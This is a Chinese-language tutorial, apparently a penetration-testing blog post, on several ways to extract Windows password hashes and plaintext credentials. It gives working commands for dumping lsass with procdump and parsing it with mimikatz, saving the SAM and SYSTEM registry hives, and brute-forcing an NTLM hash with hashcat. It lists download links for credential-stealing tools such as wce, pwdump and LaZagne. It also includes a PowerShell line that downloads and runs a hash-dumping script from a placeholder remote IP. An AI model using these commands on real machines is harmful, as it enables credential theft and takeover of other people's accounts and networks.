获取windows hash的几种方式
NTML hash是指在windows系统下的Security Account Manager中保存的用户密码hash
对Unicode字符串作MD4加密,生成32位的十六进制数字串;
unicode转换:6800610068006100310032003300
md4加密:87ed0101e532322a4566d675f1627d30
mimikatz下载地址:https://github.com/gentilkiwi/mimikatz/releases
获取的SHA1为加密后的密码,该加密字段进行md5解密即可,存在空密码的用户也会抓取到一盒哈希值,将该sha1解密后其实是个空字段
2、利用 procdump & mimikatz 获取密码(推荐使用)
procdump是 Microsoft Sysinternals tools 中的工具,它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理员确定问题发生的原因. 你还可以把它作为生成dump的工具使用在其他的脚本中。
procdump下载地址:https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump
以管理员身份运行cmd,利用procdump导出lsass进程文件
procdump.exe -accepteula -ma lsass.exe
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit)
下载地址:http://passwords.openwall.net/b/pwdump/pwdump7.zip
获取加密后的hash,可登录网站https://www.objectif-securite.ch/ophcrack,进行解密
也可以用hashcat进行**,具体使用可参考;https://xz.aliyun.com/t/4008
hashcat -a 3 -m 1000 --force 209C6174DA490CAEB422F3FA5A7AE634 ?l?l?l?l?l
SAMInside:它能从SAM注册文件中提取用户名以及密码
下载地址:https://www.ampliasecurity.com/research/windows-credentials-editor/
保存输出到文件内:wce.exe -o output.txt
reg save HKLM\SYSTEM system.hiv
reg save HKLM\security security.hiv
lsadump::sam /system:system.hiv /sam:sam.hiv
下载地址:https://github.com/ssssanr/QuarksPwDump-off-line
下载地址:https://github.com/AlessandroZ/LaZagne/releases/
LaZagne 是用于获取存储在本地计算机上的大量密码的开源应用程序,存在linux版、windows版、mac版,LaZagne.exe可捕获的密码会全一些,可抓取浏览器、无线等相关密码,获取windows hash值。
下载地址:https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1
使用方法:(xx.xx.xx.xx为存放shell的ip地址)
powershell IEX (New-Object Net.WebClient).DownloadString('http://xx.xx.xx.xx/Get-PassHashes.ps1');Get-PassHashes
https://3gstudent.github.io/Windows%E4%B8%8B%E7%9A%84%E5%AF%86%E7%A0%81hash-NTLM-hash%E5%92%8CNet-NTLM-hash%E4%BB%8B%E7%BB%8D/
https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-%E9%80%9A%E8%BF%87SAM%E6%95%B0%E6%8D%AE%E5%BA%93%E8%8E%B7%E5%BE%97%E6%9C%AC%E5%9C%B0%E7%94%A8%E6%88%B7hash/